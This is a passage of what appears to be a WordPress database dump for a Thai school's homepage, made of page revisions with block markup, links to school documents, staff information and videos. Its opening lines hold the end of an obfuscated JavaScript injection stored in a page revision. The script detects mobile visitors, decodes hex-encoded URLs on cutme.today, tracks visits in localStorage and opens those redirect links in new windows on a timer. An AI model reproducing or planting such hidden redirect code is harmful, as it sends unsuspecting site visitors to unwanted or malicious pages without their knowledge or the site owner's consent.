|\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:04:52','2024-08-30 03:04:52','',19,'http://watprato.ssk.in.th/?p=292',0,'revision','',0),
(293,2,'2024-08-30 10:06:41','2024-08-30 03:06:41','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 